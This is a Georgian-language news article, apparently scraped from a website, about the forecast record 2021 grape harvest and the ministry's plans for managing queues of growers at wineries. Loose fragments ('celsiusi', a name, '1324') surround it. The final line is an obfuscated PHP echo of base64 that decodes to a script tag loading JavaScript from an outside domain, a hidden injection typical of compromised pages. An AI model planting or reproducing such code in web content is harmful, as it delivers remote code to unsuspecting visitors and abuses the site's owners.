celsiusi
ავერსი შნაიდერი
გარემოს დაცვისა და სოფლის მეურნეობის მინისტრის მოადგილის, ოთარ შამუგიას განცხადებით, რთველი 2021-ის ფარგლებში ყურძნის საპროგნოზო მოსავალი რეკორდულ რაოდენობას, 300 ათასამდე ტონას აღწევს. ამის შესახებ, საინფორმაციო სააგენტო "ბიზნესთაიმს" ღვინის ეროვნული სააგენტოდან აცნობეს. 
 
„ყურძნის მოსავლის გადამუშავების პროცესში ღვინის 250-მდე კომპანია ჩაერთვება. რთველის პროცესში, ღვინის საწარმოებთან ყურძნით დატვირთული მანქანების რიგები, განსაკუთრებით რთველის პიკურ პერიოდში, მუშა პროცესია: ღვინის საწარმოებში ყურძნის ჩაბარება დაკავშირებულია აღრიცხვასა და კონკრეტულ  ტექნოლოგიურ პროცედურებთან, რაც საჭიროებს გარკვეულ დროს. მთავარია, რომ საკოორდინაციო შტაბის მხრიდან მოხდება რიგების ორგანიზებული მართვა. ჩვენი ამოცანაა, რომ  რიგი იყოს მაქსიმალურად ორგანიზებული,  მევენახეებს არ მოუწიოთ ლოდინი რამდენიმე დღე და მოსავლის დაბინავება შეძლონ ერთი დღის განმავლობაში“ - აღნიშნა მინისტრის მოადგილემ.
 
ოთარ შამუგიამ აღნიშნა, რომ ღვინის საწარმოებთან რიგების ორგანიზებულ მართვას მნიშვნელოვნად შეუწყობს ხელს ვენახების კადასტრის პროგრამა. კერძოდ, ღვინის საწარმოში წინასწარ წარდგენილი ვენახების კადასტრის ამონაწერის საფუძველზე, კომპანია ყურძნის ჩამბარებელ მევენახეს დაარეგისტირებს კონკრეტული დღეს, რაც ღვინის მწარმოებლებს რიგების ელექტრონული მართვის საუკეთესო შესაძლებლობას აძლევს.
 
 
1324
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");